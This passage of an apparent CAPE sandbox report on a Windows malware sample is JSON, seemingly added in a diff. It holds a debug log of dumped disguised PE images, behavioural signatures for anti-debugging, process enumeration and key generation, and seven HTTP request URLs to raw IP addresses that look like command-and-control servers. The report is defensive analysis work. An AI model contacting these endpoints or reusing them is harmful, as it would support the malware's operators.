DEBUG: 9436: AllocationHandler: Adding allocation to tracked region list: 0x025B0000, size: 0x9000.\n2025-03-07 22:33:08,036 [root] DEBUG: 9436: AddTrackedRegion: GetEntropy failed.\n2025-03-07 22:33:08,036 [root] DEBUG: 9436: DumpPEsInRange: Scanning range 0x025B0000 - 0x025B9000.\n2025-03-07 22:33:08,036 [root] DEBUG: 9436: ScanForDisguisedPE: PE image located at: 0x025B053F\n2025-03-07 22:33:08,036 [root] DEBUG: 9436: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image (process 9436)\n2025-03-07 22:33:08,036 [root] DEBUG: 9436: DumpPE: Instantiating PeParser with address: 0x025B053F.\n2025-03-07 22:33:08,052 [lib.common.results] INFO: Uploading file C:\\FPRxphIYy\\CAPE\\9436_4330881358632025 to CAPE\\568a784c6081131de7e294fc77144255559d7b3346224e2a019d30bd77642ae9; Size is 32256; Max size: 100000000\n2025-03-07 22:33:08,052 [root] DEBUG: 9436: DumpPE: PE file at 0x025B053F dumped successfully - dump size 0x7e00.\n2025-03-07 22:33:08,052 [root] DEBUG: 9436: ScanForDisguisedPE: No PE image located in range 0x025B153F-0x025B9000.\n2025-03-07 22:33:08,052 [lib.common.results] INFO: Uploading file C:\\FPRxphIYy\\CAPE\\9436_59935281358632025 to CAPE\\a87815a60683cb88d4caa06443a9e420734b2e91788c887716397d21cf69108d; Size is 36864; Max size: 100000000\n2025-03-07 22:33:08,564 [root] DEBUG: 9436: DumpMemory: Payload successfully created: C:\\FPRxphIYy\\CAPE\\9436_59935281358632025 (size 36864 bytes)\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: DumpRegion: Dumped entire allocation from 0x025B0000, size 36864 bytes.\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: ProcessTrackedRegion: Dumped region at 0x025B0000.\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: YaraScan: Scanning 0x025B0000, size 0x9000\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: ProtectionHandler: Adding region at 0x03CE1000 to tracked regions.\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: ProtectionHandler: Processing previous tracked region at: 0x025B0000.\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: DumpPEsInRange: Scanning range 0x03CE0000 - 0x03CEB136.\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: ScanForDisguisedPE: PE image located at: 0x03CE0000\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: DumpImageInCurrentProcess: Disguised PE image (bad MZ and/or PE headers) at 0x03CE0000\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: DumpImageInCurrentProcess: Attempting to dump virtual PE image.\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: DumpProcess: Instantiating PeParser with address: 0x03CE0000.\n2025-03-07 22:33:08,566 [root] DEBUG: 9436: DumpProcess: Module entry point VA is 0x00004171.\n2025-03-07 22:33:08,566 [lib.common.results] INFO: Uploading file C:\\FPRxphIYy\\CAPE\\9436_1020894281358632025 to CAPE\\14c05c655df31884413b42e3e052cd4956c043cbd92aab98464de34058390bd1; Size is 33280; Max size: 100000000\n2025-03-07 22:33:08,574 [root] DEBUG: 9436: DumpProcess: Module image dump success - dump size 0x8200.\n2025-03-07 22:33:08,574 [root] DEBUG: 9436: ScanForDisguisedPE: No PE image located in range 0x03CE1000-0x03CEB136.\n2025-03-07 22:33:08,574 [root] DEBUG: 9436: DumpRegion: Dumped PE image(s) from base address 0x03CE0000, size 49152 bytes.\n2025-03-07 22:33:08,577 [root] DEBUG: 9436: ProcessTrackedRegion: Dumped region at 0x03CE0000.\n2025-03-07 22:33:08,577 [root] DEBUG: 9436: YaraScan: Scanning 0x03CE0000, size 0xb136\n2025-03-07 22:33:08,577 [root] DEBUG: 9436: DLL loaded at 0x734E0000: C:\\Windows\\SYSTEM32\\iertutil (0x22d000 bytes).\n2025-03-07 22:33:08,577 [root] DEBUG: 9436: DLL loaded at 0x73E40000: C:\\Windows\\SYSTEM32\\srvcli (0x1d000 bytes).\n2025-03-07 22:33:08,577 [root] DEBUG: 9436: DLL loaded at 0x745D0000: C:\\Windows\\SYSTEM32\\netutils (0xb000 bytes).\n2025-03-07 22:33:08,577 [root] DEBUG: 9436: DLL loaded at 0x73710000: C:\\Windows\\SYSTEM32\\urlmon (0x1a8000 bytes).\n2025-03-07 22:33:08,577 [root] DEBUG: 9436: DLL loaded at 0x73E10000: C:\\Windows\\SYSTEM32\\userenv (0x25000 bytes).\n2025-03-07 22:33:08,585 [root] DEBUG: 9436: DLL loaded at 0x73080000: C:\\Windows\\SYSTEM32\\wininet (0x456000 bytes).\n2025-03-07 22:33:08,585 [root] DEBUG: 9436: DLL loaded at 0x745E0000: C:\\Windows\\SYSTEM32\\wtsapi32 (0xf000 bytes).\n2025-03-07 22:33:08,620 [root] DEBUG: 9436: DLL loaded at 0x74850000: C:\\Windows\\SYSTEM32\\Wldp (0x25000 bytes).\n2025-03-07 22:33:08,620 [root] DEBUG: 9436: DLL loaded at 0x74880000: C:\\Windows\\SYSTEM32\\windows.storage (0x60d000 bytes).\n2025-03-07 22:33:08,620 [root] DEBUG: 9436: api-rate-cap: FindNextFileW hook disabled due to rate\n2025-03-07 22:33:08,631 [root] DEBUG: 9436: api-rate-cap: memcpy hook disabled due to rate\n2025-03-07 22:33:08,847 [root] DEBUG: 9436: DLL loaded at 0x743F0000: C:\\Windows\\SYSTEM32\\CRYPTSP (0x13000 bytes).\n2025-03-07 22:33:08,847 [root] DEBUG: 9436: DLL loaded at 0x73AA0000: C:\\Windows\\system32\\rsaenh (0x2f000 bytes).\n2025-03-07 22:33:08,847 [root] DEBUG: 9436: DLL loaded at 0x73E00000: C:\\Windows\\SYSTEM32\\MSASN1 (0xe000 bytes).\n2025-03-07 22:33:24,845 [root] DEBUG: 9436: DLL loaded at 0x743E0000: C:\\Windows\\SYSTEM32\\kernel.appcore (0xf000 bytes).\n2025-03-07 22:33:24,845 [root] DEBUG: 9436: DLL loaded at 0x74590000: C:\\Windows\\SYSTEM32\\profapi (0x18000 bytes).\n2025-03-07 22:33:24,845 [root] DEBUG: 9436: DLL loaded at 0x73D80000: C:\\Windows\\SYSTEM32\\ondemandconnroutehelper (0x12000 bytes).\n2025-03-07 22:33:24,845 [root] DEBUG: 9436: DLL loaded at 0x739D0000: C:\\Windows\\SYSTEM32\\winhttp (0xca000 bytes).\n2025-03-07 22:33:24,845 [root] DEBUG: 9436: DLL loaded at 0x6DB80000: C:\\Windows\\system32\\mswsock (0x52000 bytes).\n2025-03-07 22:33:24,845 [root] DEBUG: 9436: DLL loaded at 0x738C0000: C:\\Windows\\SYSTEM32\\IPHLPAPI (0x33000 bytes).\n2025-03-07 22:33:24,860 [root] DEBUG: 9436: DLL loaded at 0x76040000: C:\\Windows\\System32\\NSI (0x7000 bytes).\n2025-03-07 22:33:24,860 [root] DEBUG: 9436: DLL loaded at 0x74630000: C:\\Windows\\SYSTEM32\\WINNSI (0x8000 bytes).\n2025-03-07 22:36:08,307 [root] INFO: Analysis timeout hit, terminating analysis\n2025-03-07 22:36:08,307 [lib.api.process] INFO: Terminate event set for \n2025-03-07 22:36:08,307 [root] DEBUG: 9436: Terminate Event: Attempting to dump process 9436\n2025-03-07 22:36:08,307 [root] DEBUG: 9436: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-03-07 22:36:08,307 [root] DEBUG: 9436: Terminate Event: Current region 0x029B1748\n2025-03-07 22:36:08,307 [lib.api.process] INFO: Termination confirmed for \n2025-03-07 22:36:08,307 [root] DEBUG: 9436: Terminate Event: monitor shutdown complete for process 9436\n2025-03-07 22:36:08,307 [root] INFO: Terminate event set for process 9436\n2025-03-07 22:36:08,307 [root] INFO: Created shutdown mutex\n2025-03-07 22:36:09,323 [root] INFO: Shutting down package\n2025-03-07 22:36:09,323 [root] INFO: Stopping auxiliary modules\n2025-03-07 22:36:09,323 [root] INFO: Stopping auxiliary module: Browser\n2025-03-07 22:36:09,323 [root] INFO: Stopping auxiliary module: Human\n2025-03-07 22:36:10,401 [root] INFO: Stopping auxiliary module: Screenshots\n2025-03-07 22:36:10,401 [root] INFO: Finishing auxiliary modules\n2025-03-07 22:36:10,401 [root] INFO: Shutting down pipe server and dumping dropped files\n2025-03-07 22:36:10,401 [root] WARNING: Folder at path \"C:\\FPRxphIYy\\debugger\" does not exist, skipping\n2025-03-07 22:36:10,401 [root] INFO: Uploading files at path \"C:\\FPRxphIYy\\tlsdump\"\n2025-03-07 22:36:10,401 [lib.common.results] INFO: Uploading file C:\\FPRxphIYy\\tlsdump\\tlsdump.log to tlsdump\\tlsdump.log; Size is 64664; Max size: 100000000\n2025-03-07 22:36:10,416 [root] INFO: Analysis completed\n", + "errors": [] + }, + "network": {}, + "suricata": { + "alerts": [], + "tls": [], + "perf": [], + "files": [], + "http": [], + "dns": [], + "ssh": [], + "fileinfo": [], + "eve_log_full_path": null, + "alert_log_full_path": null, + "tls_log_full_path": null, + "http_log_full_path": null, + "file_log_full_path": null, + "ssh_log_full_path": null, + "dns_log_full_path": null + }, + "url_analysis": {}, + "procmemory": [], + "signatures": [ + { + "name": "antidebug_setunhandledexceptionfilter", + "description": "SetUnhandledExceptionFilter detected (possible anti-debug)", + "categories": [ + "anti-debug" + ], + "severity": 1, + "weight": 1, + "confidence": 40, + "references": [], + "data": [ + { + "type": "call", + "pid": 9436, + "cid": 152 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "generates_crypto_key", + "description": "Uses Windows APIs to generate a cryptographic key", + "categories": [], + "severity": 1, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "type": "call", + "pid": 9436, + "cid": 671 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "dead_connect", + "description": "Attempts to connect to a dead IP:Port (7 unique times)", + "categories": [ + "network" + ], + "severity": 2, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "type": "call", + "pid": 9436, + "cid": 1266 + }, + { + "type": "call", + "pid": 9436, + "cid": 1486 + }, + { + "type": "call", + "pid": 9436, + "cid": 1722 + }, + { + "type": "call", + "pid": 9436, + "cid": 1934 + }, + { + "type": "call", + "pid": 9436, + "cid": 2154 + }, + { + "type": "call", + "pid": 9436, + "cid": 2372 + }, + { + "type": "call", + "pid": 9436, + "cid": 2583 + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "http_request", + "description": "Performs HTTP requests potentially not found in PCAP.", + "categories": [ + "network" + ], + "severity": 2, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "url": "174.100.27.229:80/0QpXNAhfFF/lZOxY3vCMhmmxYVL2WX/2FY1XaTSPr84bq/" + }, + { + "url": "209.126.6.222:8080/XVp1VqQDpvpVag9d/wQMRF0guzD/S26EMjo4ceGc4xTOH/" + }, + { + "url": "5.153.250.14:8080/x2TlMmU/iwvTQcb9OvTX4QuVeIW/37kvgQEwswmPg/izIq/" + }, + { + "url": "192.241.146.84:8080/KmdXW7KWDQ9NsVk5Qau/UkFPziJTzAl/" + }, + { + "url": "95.9.180.128:80/1MrMglUzL5j3fbU5/EuN3bBd6/kczmTPewfVTQppodv/" + }, + { + "url": "77.55.211.77:8080/yFaW/" + }, + { + "url": "85.105.140.135:443/fVEvx1RAzHe/6QbfAi/orpr/2XrB0aoHVLYsqPBnOV/" + } + ], + "new_data": [], + "alert": false, + "families": [] + }, + { + "name": "enumerates_running_processes", + "description": "Enumerates running processes", + "categories": [ + "discovery" + ], + "severity": 2, + "weight": 1, + "confidence": 100, + "references": [], + "data": [ + { + "process": "System with pid 4" + }, + { + "type": "call", + "pid": 9436, + "cid": 461 + }, + { + "process": "Registry with pid 92" + }, + { + "type": "call", + "pid": 9436, + "cid": 462 + }, + { + "process": "smss.exe with pid 328" + }, + { + "type": "call", + "pid": 9436, + "cid": 463 + }, + { + "process": "csrss.exe with pid 428" + }, + { + "type": "call", + "pid": 9436, + "cid": 464 + }, + { + "process": "wininit.exe with pid 504" + }, + { + "type": "call", + "pid": 9436, + "cid": 465 + }, + { + "process": "csrss.exe with pid 516" + }, + { + "type": "call", + "pid": 9436, + "cid": 466 + }, + { + "process": "winlogon.exe with pid 600" + }, + { + "type": "call", + "pid": 9436, + "cid": 467 + }, + { + "process": "services.exe with pid 640" + }, + { + "type": "call", + "pid": 9436, + "cid": 468 + }, + { + "process": "lsass.exe with pid 660" + }, + { + "type": "call", + "pid": 9436, + "cid": 469 + }, + { + "process": "fontdrvhost.exe with pid 752" + }, + { + "type": "call", + "pid": 9436, + "cid": 470 + }, + { + "process": "fontdrvhost.exe with pid 760" + }, + { + "type": "call", + "pid": 9436, + "cid": 471 + }, + { + "process": "svchost.exe with pid 768" + }, + { + "type": "call", + "pid": 9436, + "cid": 472 + }, + { + "process": "svchost.exe with pid 880" + }, + { + "type": "call", + "pid": 9436, + "cid": 473 + }, + { + "process": "svchost.exe with pid 932" + }, + { + "type": "call", + "pid": 9436, + "cid": 474 + }, + { + "process": "dwm.exe with pid 1004" + }, + { + "type": "call", + "pid": 9436, + "cid": 475 + }, + { + "process": "svchost.exe with pid 520" + }, + { + "type": "call", + "pid": 9436, + "cid": 476 + }, + { + "process": "svchost.exe with pid 696" + }, + { + "type": "call", + "pid": 9436, + "cid": 477 + }, + { + "process": "svchost.exe with pid 844" + }, + { + "type": "call", + "pid": 9436, + "cid": 478 + }, + { + "process": "svchost.exe with pid 1100" + }, + { + "type": "call", + "pid": 9436, + "cid": 479 + }, + { + "process": "svchost.exe with pid 1120" + }, + { + "type": "call", + "pid": 9436, + "cid": 480 + }, + { + "process": "svchost.exe with pid 1140" + }, + { + "type": "call", + "pid": 9436, + "cid": 481 + }, + { + "process": "svchost.exe with pid 1152" + }, + { + "type": "call", + "pid": 9436, + "cid": 482 + }, + { + "process": "svchost.exe with pid 1172" + }, + { + "type": "call", + "pid": 9436, + "cid": 483 + }, + { + "process": "svchost.exe with pid 1224" + }, + { + "type": "call", + "pid": 9436, + "cid": 484 + }, + { + "process": "svchost.exe with pid 1328" + }, + { + "type": "call", + "pid": 9436, + "cid": 485 + }, + { + "process": "svchost.exe with pid 1392" + }, + { + "type": "call", + "pid": 9436, + "cid": 486 + }, + { + "process": "svchost.exe with pid 1400" + }, + { + "type": "call", + "pid": 9436, + "cid": 487 + }, + { + "process": "svchost.exe with pid 1492" + }, + { + "type": "call", + "pid": 9436, + "cid": 488 + }, + { + "process": "svchost.exe with pid 1604" + }, + { + "type": "call", + "pid": 9436, + "cid": 489 + }, + { + "process": "svchost.exe with pid 1612" + }, + { + "type": "call", + "pid": 9436, + "cid": 490 + }, + { + "process": "svchost.exe with pid 1636" + }, + { + "type": "call", + "pid": 9436, + "cid": 491 + }, + { + "process": "Memory Compression with pid 1700" + }, + { + "type": "call", + "pid": 9436, + "cid": 492 + }, + { + "process": "svchost.exe with pid 1712" + }, + { + "type": "call", + "pid": 9436, + "cid": 493 + }, + { + "process": "svchost.exe with pid 1736" + }, + { + "type": "call", + "pid": 9436, + "cid": 494 + }, + { + "process": "svchost.exe with pid 1776" + }, + { + "type": "call", + "pid": 9436, + "cid": 495 + }, + { + "process": "svchost.exe with pid 1784" + }, + { + "type": "call", + "pid": 9436, + "cid": 496 + }, + { + "process": "svchost.exe with pid 1864" + }, + { + "type": "call", + "pid": 9436, + "cid": 497 + }, + { + "process": "svchost.exe with pid 1940" + }, + { + "type": "call", + "pid": 9436, + "cid": 498 + }, + { + "process": "svchost.exe with pid 1988" + }, + { + "type": "call", + "pid": 9436, + "cid": 499 + }, + { + "process": "svchost.exe with pid 2020" + }, + { + "type": "call", + "pid": 9436, + "cid": 500 + }, + { + "process": "svchost.exe with pid 2040" + }, + { + "type": "call", + "pid": 9436, + "cid": 501 + }, + { + "process": "svchost.exe with pid 1044" + }, + { + "type": "call", + "pid": 9436, + "cid": 502 + }, + { + "process": "svchost.exe with pid 2084" + }, + { + "type": "call", + "pid": 9436, + "cid": 503 + }, + { + "process": "svchost.exe with pid 2132" + }, + { + "type": "call", + "pid": 9436, + "cid": 504 + }, + { + "process": "spoolsv.exe with pid 2208" + }, + { + "type": "call", + "pid": 9436, + "cid": 505 + }, + { + "process": "svchost.exe with pid 2260" + }, + { + "type": "call", + "pid": 9436, + "cid": 506 + }, + { + "process": "svchost.exe with pid 2320" + }, + { + "type": "call", + "pid": 9436, + "cid": 507 + }, + { + "process": "svchost.exe with pid 2432" + }, + { + "type": "call", + "pid": 9436, + "cid": 508 + }, + { + "process": "svchost.exe with pid 2468" + }, + { + "type": "call", + "pid": 9436, + "cid": 509 + }, + { + "process": "svchost.exe with pid 2512" + }, + { + "type": "call", + "pid": 9436, + "cid": 510 + }, + { + "process": "svchost.exe with pid 2544" + }, + { + "type": "call", + "pid": 9436, + "cid": 511 + }, + { + "process": "svchost.exe with pid 2564" + }, + { + "type": "call", + "pid": 9436, + "cid": 512 + }, + { + "process": "svchost.exe with pid 2580" + }, + { + "type": "call", + "pid": 9436, + "cid": 513 + }, + { + "process": "svchost.exe with pid 2608" + }, + { + "type": "call", + "pid": 9436, + "cid": 514 + }, + { + "process": "svchost.exe with pid 2732" + }, + { + "type": "call", + "pid": 9436, + "cid": 515 + }, + { + "process": "svchost.exe with pid 2756" + }, + { + "type": "call", + "pid": 9436, + "cid": 516 + }, + { + "process": "svchost.exe with pid 2772" + }, + { + "type": "call", + "pid": 9436, + "cid": 517 + }, + { + "process": "MsMpEng.exe with pid 2780" + }, + { + "type": "call", + "pid": 9436, + "cid": 518 + }, + { + "process": "svchost.exe with pid 2892" + }, + { + "type": "call", + "pid": 9436, + "cid": 519 + }, + { + "process": "svchost.exe with pid 3004" + }, + { + "type": "call", + "pid": 9436, + "cid": 520 + }, + { + "process": "svchost.exe with pid 3216" + }, + { + "type": "call", + "pid": 9436, + "cid": 521 + }, + { + "process": "svchost.exe with pid 3544" + }, + { + "type": "call", + "pid": 9436, + "cid": 522 + }, + { + "process": "sihost.exe with pid 3724" + }, + { + "type": "call", + "pid": 9436, + "cid": 523 + }, + { + "process": "svchost.exe with pid 3740" + }, + { + "type": "call", + "pid": 9436, + "cid": 524 + }, + { + "process": "svchost.exe with pid 3768" + }, + { + "type": "call", + "pid": 9436, + "cid": 525 + }, + { + "process": "taskhostw.exe with pid 3868" + }, + { + "type": "call", + "pid": 9436, + "cid": 526 + }, + { + "process": "MicrosoftEdgeUpdate.exe with pid 3888" + }, + { + "type": "call", + "pid": 9436, + "cid": 527 + }, + { + "process": "svchost.exe with pid 3928" + }, + { + "type": "call", + "pid": 9436, + "cid": 528 + }, + { + "process": "taskhostw.exe with pid 3940" + }, + { + "type": "call", + "pid": 9436, + "cid": 529 + }, + { + "process": "svchost.exe with pid 4056" + }, + { + "type": "call", + "pid": 9436, + "cid": 530 + }, + { + "process": "ctfmon.exe with pid 1564" + }, + { + "type": "call", + "pid": 9436, + "cid": 531 + }, + { + "process": "svchost.exe with pid 4132" + }, + { + "type": "call", + "pid": 9436, + "cid": 532 + }, + { + "process": "explorer.exe with pid 4248" + }, + { + "type": "call", + "pid": 9436, + "cid": 533 + }, + { + "process": "svchost.exe with pid 4372" + }, + { + "type": "call", + "pid": 9436, + "cid": 534 + }, + { + "process": "svchost.exe with pid 4432" + }, + { + "type": "call", + "pid": 9436, + "cid": 535 + }, + { + "process": "svchost.exe with pid 4812" + }, + { + "type": "call", + "pid": 9436, + "cid": 536 + }, + { + "process": "svchost.exe with pid 4908" + }, + { + "type": "call", + "pid": 9436, + "cid": 537 + }, + { + "process": "svchost.exe with pid 4936" + }, + { + "type": "call", + "pid": 9436, + "cid": 538 + }, + { + "process": "StartMenuExperienceHost.exe with pid 3508" + }, + { + "type": "call", + "pid": 9436, + "cid": 539 + }, + { + "process": "RuntimeBroker.exe with pid 4712" + }, + { + "type": "call", + "pid": 9436, + "cid": 540 + }, + { + "process": "svchost.exe with pid 5144" + }, + { + "type": "call", + "pid": 9436, + "cid": 541 + }, + { + "process": "SearchApp.exe with pid 5324" + }, + { + "type": "call", + "pid": 9436, + "cid": 542 + }, + { + "process": "RuntimeBroker.exe with pid 5444" + }, + { + "type": "call", + "pid": 9436, + "cid": 543 + }, + { + "process": "SearchIndexer.exe with pid 5456" + }, + { + "type": "call", + "pid": 9436, + "cid": 544 + }, + { + "process": "svchost.exe with pid 5716" + }, + { + "type": "call", + "pid": 9436, + "cid": 545 + }, + { + "process": "svchost.exe with pid 5876" + }, + { + "type": "call", + "pid": 9436, + "cid": 546 + }, + { + "process": "smartscreen.exe with pid 6068" + }, + { + "type": "call", + "pid": 9436, + "cid": 547 + }, + { + "process": "SecurityHealthSystray.exe with pid 6108" + }, + { + "type": "call", + "pid": 9436, + "cid": 548 + }, + { + "process": "SecurityHealthService.exe with pid 5216" + }, + { + "type": "call", + "pid": 9436, + "cid": 549 + }, + { + "process": "svchost.exe with pid 6468" + }, + { + "type": "call", + "pid": 9436, + "cid": 550 + }, + { + "process": "svchost.exe with pid 7000" + }, + { + "type": "call", + "pid": 9436, + "cid": 551 + }, + { + "process": "ApplicationFrameHost.exe with pid 7132" + }, + { + "type": "call", + "pid": 9436, + "cid": 552 + }, + { + "process": "svchost.exe with pid 6384" + }, + { + "type": "call", + "pid": 9436, + "cid": 553 + }, + { + "process": "svchost.exe with pid 7592" + }, + { + "type": "call", + "pid": 9436, + "cid": 554 + }, + { + "process": "svchost.exe with pid 7620" + }, + { + "type": "call", + "pid": 9436, + "cid": 555 + }, + { + "process": "audiodg.exe with pid 7760" + }, + { + "type": "call", + "pid": 9436, + "cid": 556 + }, + { + "process": "ShellExperienceHost.exe with pid 7964" + }, + { + "type": "call", + "pid": 9436, + "cid": 557 + }, + { + "process": "RuntimeBroker.exe with pid 8048" + }, + { + "type": "call", + "pid": 9436, + "cid": 558 + }, + { + "process": "TextInputHost.exe with pid 7716" + }, + { + "type": "call", + "pid": 9436, + "cid": 559 + }, + { + "process": "svchost.exe with pid 812" + }, + { + "type": "call", + "pid": 9436, + "cid": 560 + }, + { + "process": "WinStore.App.exe with pid 7444" + }, + { + "type": "call", + "pid": 9436, + "cid": 561 + }, + { + "process": "RuntimeBroker.exe with pid 4772" + }, + { + "type": "call", + "pid": 9436, + "cid": 562 + }, + { + "process": "svchost.exe with pid 7408" + }, + { + "type": "call", + "pid": 9436, + "cid": 563 + }, + { + "process": "RuntimeBroker.exe with pid 7736" + }, + { + "type": "call", + "pid": 9436, + "cid": 564 + }, + { + "process": "svchost.exe with pid 6580" + }, + { + "type": "call", + "pid": 9436, + "cid": 565 + }, + { + "process": "svchost.exe with pid 6536" + }, + { + "type": "call", + "pid": 9436, + "cid": 566 + }, + { + "process": "SearchProtocolHost.exe with pid 2148" + }, + { + "type": "call", + "pid": 9436, + "cid": 567 + }, + { + "process": "dllhost.exe with pid 1592" + }, + { + "type": "call", + "pid": 9436, + "cid": 568 + }, + { + "process": "svchost.exe with pid 6316" + }, + { + "type": "call", + "pid": 9436, + "cid": 569 + }, + { + "process": "SgrmBroker.exe with pid 3540" + }, + { + "type": "call", + "pid": 9436, + "cid": 570 + }, + { + "process": "svchost.exe with pid 4160" + }, + { + "type": "call", + "pid": 9436, + "cid": 571 + }, + { + "process": "svchost.exe with pid 6388" + }, + { + "type": "call", + "pid": 9436, + "cid": 572 + }, + { + "process": "svchost.exe with pid 7140" + }, + { + "type": "call", + "pid": 9436, + "cid": 573 + }, + { + "process": "msiexec.exe with pid 6840" + }, + { + "type": "call", + "pid": 9436, + "cid": 574 + }, + { + "process": "svchost.exe with pid 7556" + }, + { + "type": "call", + "pid": 9436, + "cid": 575 + }, + { + "process": "msedge.exe with pid 364" + }, + { + "type": "call", + "pid": 9436, + "cid": 576 + }, + { + "process": "msedge.exe with pid 7904" + }, + { + "type": "call", + "pid": 9436, + "cid": 577 + }, + { + "process": "msedge.exe with pid 1888" + }, + { + "type": "call", + "pid": 9436, + "cid": 578 + }, + { + "process": "msedge.exe with pid 3788" + }, + { + "type": "call", + "pid": 9436, + "cid": 579 + }, + { + "process": "msedge.exe with pid 1876" + }, + { + "type": "call", + "pid": 9436, + "cid": 580 + }, + { + "process": "pyw.exe with pid 3876" + }, + { + "type": "call", + "pid": 9436, + "cid": 581 + }, + { + "process": "pythonw.exe with pid 4696" + }, + { + "type": "call", + "pid": 9436, + "cid": 582 + }, + { + "process": "msedge.exe with pid 6080" + }, + { + "type": "call", + "pid": 9436, + "cid": 583 + }, + { + "process": "msedge.exe with pid 8" + }, + { + "type": "call", + "pid": 9436, + "cid": 584 + }, + { + "process": "msedge.exe with pid 7396" + }, + { + "type": "call", + "pid": 9436, + "cid": 585 + }, + { + "process": "msedge.exe with pid 3492" + }, + { + "type": "call", + "pid": 9436, + "cid": 586 + }, + { + "process": "taskhostw.exe with pid 7488" + }, + { + "type": "call", + "pid": 9436, + "cid": 587 + }, + { + "process": "MicrosoftEdgeUpdate.exe with pid 5140" + }, + { + "type": "call", + "pid": 9436, + "cid": 588 + }, + { + "process": "upfc.exe with pid 944" + }, + { + "type": "call", + "pid": 9436, + "cid": 589 + }, + { + "process": "CompatTelRunner.exe with pid 6344" + }, + { + "type": "call", + "pid": 9436, + "cid": 590 + }, + { + "process": "TrustedInstaller.exe with pid 4624" + }, + { + "type": "call", + "pid": 9436, + "cid": 591 + }, + { + "process": "svchost.exe with pid 4512" + }, + { + "type": "call", + "pid": 9436, + "cid": 592 + }, + { + "process": "TiWorker.exe with pid 6300" + }, + { + "type": "call", + "pid": 9436, + "cid": 593 + }, + { + "process": "backgroundTaskHost.exe with pid 4768" + }, + { + "type": "call", + "pid": 9436, + "cid": 594 + }, + { + "process": "backgroundTaskHost.exe with pid 8128" + }, + { + "type": "call", + "pid": 9436, + "cid": 595 + }, + { + "process": "backgroundTaskHost.exe with pid 6864" + }, + { + "type": "call", + "pid": 9436, + "cid": 596 + }, + { + "process": "SkypeApp.exe with pid 2636" + }, + { + "type": "call", + "pid": 9436, + "cid": 597 + }, + { + "process": "WMIADAP.exe with pid 396" + }, + { + "type": "call", + "pid": 9436, + "cid": 598 + }, + { + "process": "conhost.exe with pid 8172" + }, + { + "type": "call", + "pid": 9436, + "cid": 599 + }, + { + "process": "dllhost.exe with pid 5748" + }, + { + "type": "call", + "pid": 9436, + "cid": 600 + }, + { + "process": "MoUsoCoreWorker.exe with pid 8112" + }, + { + "type": "call", + "pid": 9436, + "cid": 601 + }, + { + "process": "sppsvc.exe with pid 616" + }, + { + "type": "call", + "pid": 9436, + "cid": 602 + }, + { + "process": "svchost.exe with pid 7472" + }, + { + "type": "call", + "pid": 9436, + "cid": 603 + }, + { + "process": "SppExtComObj.Exe with pid 368" + }, + { + "type": "call", + "pid": 9436, + "cid": 604 + }, + { + "process": "slui.exe with pid 7756" + }, + { + "type": "call", + "pid": 9436, + "cid": 605 + }, + { + "process": "svchost.exe with pid 184" + }, + { + "type": "call", + "pid": 9436, + "cid": 606 + }, + { + "process": "CompatTelRunner.exe with pid 6292" + }, + { + "type": "call", + "pid": 9436, + "cid": 607 + }, + { + "process": "slui.exe with pid 8200" + }, + { + "type": "call", + "pid": 9436, + "cid": 608 + }, + { + "process": "backgroundTaskHost.exe with pid 8668" + }, + { + "type": "call", + "pid": 9436, + "cid": 609 + }, + { + "process": "backgroundTaskHost.exe with pid 8760" + }, + { + "type": "call", + "pid": 9436, + "cid": 610 + }, + { + "process": "RuntimeBroker.exe with pid 8836" + }, + { + "type": "call", + "pid": 9436, + "cid": 611 + }, + { + "process": "svchost.exe with pid 3056" + }, + { + "type": "call", + "pid": 9436, + "cid": 612 + }, + { + "process": "RuntimeBroker.exe with pid 8412" + }, + { + "type": "call", + "pid": 9436, + "cid": 613 + }, + { + "process": "svchost.exe with pid 8936" + }, + { + "type": "call", + "pid": 9436, + "cid": 614 + }, + { + "process": "RuntimeBroker.exe with pid 8608" + }, + { + "type": "call", + "pid": 9436, + "cid": 615 + }, + { + "process": "CompatTelRunner.exe with pid 9048" + }, + { + "type": "call", + "pid": 9436, + "cid": 616 + }, + { + "process": "svchost.exe with pid 8292" + }, + { + "type": "call", + "pid": 9436, + "cid": 617 + }, + { + "process": "WmiPrvSE.exe with pid 7260" + }, + { + "type": "call", + "pid": 9436, + "cid": 618 + }, + { + "process": "dllhost.exe with pid 9264" + }, + { + "type": "call", + "pid": 9436, + "cid": 619 + }, + { + "process": "3937597df70645ac297e.exe with pid 9436" + }, + { + "type": "call", + "pid": 9436, + "cid": 620 + }, + { + "process": "svchost.exe with pid 9512" + }, + { + "type": "call", + "pid": 9436, + "cid": 958 + }, + { + "process": "WmiPrvSE.exe with pid 9600" + }, + { + "type": "call", + "pid": 9436, + "cid": 959 + }, + { + "process": "RuntimeBroker.exe with pid 9688" + }, + { + "type": "call", + "pid": 9436, + "cid": 960 + }, + { + "process": "RuntimeBroker.exe with pid 9720" + }, + { + "type": "call", + "pid": 9436, + "cid": 961 + }, + { + "process": "WmiPrvSE.exe with pid 9756" + }, + { + "type": "call", + "pid": 9436, + "cid": 962 + }, + { + "process": "OneDrive.exe with pid 9972" + }, + { + "type": "call", + "pid": 9436, + "cid": 963 + }, + { + "process": "SkypeBackgroundHost.exe with pid 7352" + }, + { + "type": "call", + "pid": 9436, + "cid": 964 + }, + { + "process": "svchost.exe with pid 8568" + }, + { + "type": "call", + "pid": 9436, + "cid": 965 + }, + { + "process": "MicrosoftEdgeUpdate.exe with pid 7144" + }, + { + "type": "call", + "pid": 9436, + "cid": 966 + }, + { + "process": "MicrosoftEdgeUpdate.exe with pid 5208" + }, + { + "type": "call", + "pid": 9436, + "cid": 967 + }, + { + "process": "MicrosoftEdgeUpdate.exe with pid 9936" + }, + { + "type": "call", + "pid": 9436, + "cid": 968 + }, + { + "process": "VSSVC.exe 